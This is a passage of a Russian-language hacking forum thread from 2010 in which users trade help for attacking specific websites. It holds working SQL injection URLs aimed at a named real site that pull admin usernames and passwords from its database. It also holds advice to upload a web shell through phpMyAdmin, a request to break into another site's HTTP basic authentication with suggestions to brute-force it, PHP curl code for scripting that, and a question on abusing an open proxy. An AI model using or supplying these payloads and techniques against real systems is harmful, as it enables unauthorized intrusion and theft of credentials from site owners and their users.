Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.05.2010, 02:23
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://ping.ua/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+and+(select+1+from+(select+count(0),concat((select+concat_ws(0x3a,admin_username,admin_password)+from+se_admins+limit+0,1),floor(rand(0)*2))+from+se_admins+group+by+2)a)--+
последняя единичка в каждом результате лишняя |
|
|
07.05.2010, 04:38
|
|
Новичок
Регистрация: 05.05.2010
Сообщений: 2
Провел на форуме:
10773
Репутация:
0
|
|
Сообщение от kfor
Попробуй залить шелл через пхп май админ если есть разрешение на into outfile
а как узнать куда его заливать. те где находятся файлы сайта 
|
|
|
|
07.05.2010, 05:06
|
|
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738
Репутация:
2
|
|
Сообщение от ReckouNT
Нужно поломать сайт с аунтификацией такого вида а-ля alert (JS). На вид подумал что сама аунтификация довольно старая, и возможно есть уязвимости.
Пикча формы, на фоне - страница, открывающаяся после неуспешного входа (адреса счел нужным скрыть)
http://s58.radikal.ru/i160/1005/34/9cb26e6c3bc2.png
Такая штука отображается при доступе к фаилу http://site/admin.php. На пхп фаил не похоже, судя по форме неудачи, прописано где то в апаче.
brutus-aet2 ом прогонять пробовал, выдает бред при разных настройках. По словарю он выдает каждый раз новые пароли, по подбору - тоже.
Спасибо.
ЗЫ: Поиск юзал. Просьба постить только по теме.
ЗЗЫ: Если запостил тему не в том разделе, просьба переместить и отправить ссылку в ЛС.
ЗЗЗЫ: Ломаю не ради интереса и не ради того, чтобы "нагадить".
Ап
|
|
|
|
07.05.2010, 05:18
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
ReckouNT забей..
|
|
|
|
07.05.2010, 05:29
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
ReckouNT, увы но бесик авторизацию ты не обойдешь. Только брутом.
|
|
|
|
07.05.2010, 06:49
|
|
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738
Репутация:
2
|
|
Сообщение от [Feldmarschall]
ReckouNT забей..
Не могу, к данному сайту личный интерес. К тому же там большая база юзверей и он самописный, дырок должно быть дофига.
Сообщение от warlok
ReckouNT, увы но бесик авторизацию ты не обойдешь. Только брутом.
Очень жаль, я надеялся что к такому старому способу что либо придумали. Брут там использовать очень легко.
Ладно, придется либо брутить, либо искать новую уязвимость.
=======
Да, и кстати: как можно просмотреть исходный код страницы при вылетающем окне? В фф и осле просмотреть не могу, т.к. мигает окно логинпасса по причине что не ввел данные.
На странице неудачи входа он меняется. Нужно посмотреть, какие имена присвоены полям, для настройки брута.
|
|
|
|
07.05.2010, 07:37
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Исправьте запрос, никак не могу вывести таблицу http://blocked/browse_classifieds.php?s=classified_date%20DESC&v= 0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admi n_password),2,3+from+se_admins
unhex(hex(admin_username))
aes_descrypt(aes_encrypt(admin_username,12),12)
или таблица находится в другой бд.
|
|
|
|
07.05.2010, 08:06
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от burn90
а как узнать куда его заливать. те где находятся файлы сайта ты хоть сам то понял что написал?
|
|
|
|
07.05.2010, 08:13
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Да, и кстати: как можно просмотреть исходный код страницы при вылетающем окне? В фф и осле просмотреть не могу, т.к. мигает окно логинпасса по причине что не ввел данные.
На странице неудачи входа он меняется. Нужно посмотреть, какие имена присвоены полям, для настройки брута.
А никак ты это не сделаешь, там формы как таковой нету. Вот пример http авторизации на пхп
PHP код:
<?php
$result = http_auth('http://site.ru/admin/','username','password');
echo $result;
function http_auth($url,$login,$password) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERPWD, $login.":".$password);
$result = curl_exec($ch);
return $result;
}
?>
ну а с брутом там сам разбирайся, не думаю что это сложно.
|
|
|
|
07.05.2010, 13:34
|
|
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737
Репутация:
-5
|
|
Подскажите как можно использовать открытый прокси, ну т.е сканер выдал открыт порт 8080
Это может позволить злоумышленнику обойти брандмауэр и подключить к чувствительным порты, такие как 23 (Telnet), 25 (Sendmail)
ну вот что то такое... хотелось бы не много подробнее про это
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.gif){kind=avatar}
Похожие темы
Линейный вид
